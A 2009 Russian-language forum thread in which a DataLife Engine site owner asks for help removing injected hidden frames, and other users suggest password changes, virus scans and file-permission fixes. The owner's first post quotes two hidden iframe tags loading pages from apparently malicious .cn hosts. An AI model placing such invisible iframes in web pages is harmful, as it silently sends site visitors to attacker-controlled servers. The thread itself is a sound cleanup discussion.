alleclf 6 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 На сайте появился чужой фрейм. Я нашел и удалил код в index.php - со страниц сайта фрейм пропал, но остался в админке. Да и сама админка сейчас растянутая, с верху и снизу пустые места размером с шапку. В коде страницы стоят фреймы. там вначале стоит: <iframe src="http://globalnameshop.cn:8080/index.php" width=171 height=160 style="visibility: hidden"></iframe> и в конце: <iframe src="http://mediahomenameshopmovie.cn:8080/index.php" width=138 height=142 style="visibility: hidden"></iframe> Помогите пожалуйста от них избавится, где их искать? mobine.ru Цитата Ссылка на сообщение Поделиться на других сайтах
Nektov 59 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 А у Вас не нул ? Цитата Ссылка на сообщение Поделиться на других сайтах
alleclf 6 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 (изменено) Автор нет, лицензия скоро год будет Изменено 9 июня 2009 пользователем alleclf Цитата Ссылка на сообщение Поделиться на других сайтах
Nektov 59 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 Меняйте пароли к сайту, хостингу, ФТП и тд. Сломали вас. Либо ваших соседей. Можете убрать право записи на файлы шаблона, немного геморно, но должно помочь. Цитата Ссылка на сообщение Поделиться на других сайтах
alleclf 6 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 Автор Это понятно, а как сейчас убрать то что уже есть (фреймы) в админке? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 Проверьте на вирусы в админке DLE и в изменившихся файлах удалите эти строчки Цитата Ссылка на сообщение Поделиться на других сайтах
alleclf 6 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 Автор Там все нормально, только файлы из кеша, а у всех остальных дата изменения старая (4 месяц). Все, отловил гада. Dr.Web online помог - показал зараженные файлы. Цитата Ссылка на сообщение Поделиться на других сайтах
Nektov 59 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 В каких именно страницах есть фреймы ? Почистите код тех страниц (части кодов) в которых всплывает фрейм + Сообщение #4 Также можете поставить бан IP сайтов фрейма. Цитата Ссылка на сообщение Поделиться на других сайтах
alleclf 6 Опубликовано: 9 июня 2009 Рассказать Опубликовано: 9 июня 2009 Автор Вот тут был фрейм: public_html/engine/inc/main.php public_html/engine/skins/default.skin.php и еще в index.php - я там сразу нашел в первых двух фрейм всплывал в админке, в третьем - на страницах сайта. Я всем файлам из "engine/inc", "engine/skins" и "admin.php", "index.php" поставил "444" посмотрим... ... надеюсь ничего не заглючит Цитата Ссылка на сообщение Поделиться на других сайтах
ks95 2 Опубликовано: 25 августа 2009 Рассказать Опубликовано: 25 августа 2009 Здравствуйте уважаемые! У меня тоже подобное было, еле-еле вычистил. Потом нашёл интересную информацию о подобной проблеме, и как люди с ней бьются. Если интересно, здесь читал: http://besthosting.com.ua/virus-ftp.php Цитата Ссылка на сообщение Поделиться на других сайтах
mel 0 Опубликовано: 26 августа 2009 Рассказать Опубликовано: 26 августа 2009 у меня тоже такая проблема присоеденяюсь поддержую тему. И нетолько на DLE а еще на другом сайте который никакого отношения к DLE не имеет сейчас ищу способы вылечить сайты Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.